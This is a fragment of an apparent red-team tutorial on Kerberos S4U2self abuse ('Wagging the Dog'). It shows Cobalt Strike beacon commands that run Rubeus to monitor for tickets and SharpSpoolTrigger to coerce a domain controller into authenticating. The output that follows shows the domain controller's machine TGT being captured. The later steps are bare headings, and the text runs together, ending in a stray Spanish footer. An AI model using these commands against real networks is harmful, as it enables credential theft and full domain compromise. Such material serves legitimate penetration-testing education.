S4U2self
Step 1: Force Authentication and Capture the TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrapbeacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe [DOMAIN_CONTROLLER] [COMPROMISED_SERVER]
NdrClientCall2x64[-]RpcRemoteFindFirstPrinterChangeNotificationEx status: 6[*] 21/02/2025 11:54:39 UTC - Found new TGT:
User : [DOMAIN_CONTROLLER]$@[DOMAIN.COM]
StartTime : 21/02/2025 10:39:21
EndTime : 21/02/2025 20:38:58
RenewTill : 28/02/2025 10:38:58
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket : doIFt[...snip...]5DT00=Step 2: The Problem (Why the Machine TGT isn't Enough)
Step 3: The Solution (S4U2self Abuse "Wagging the Dog")
Última actualización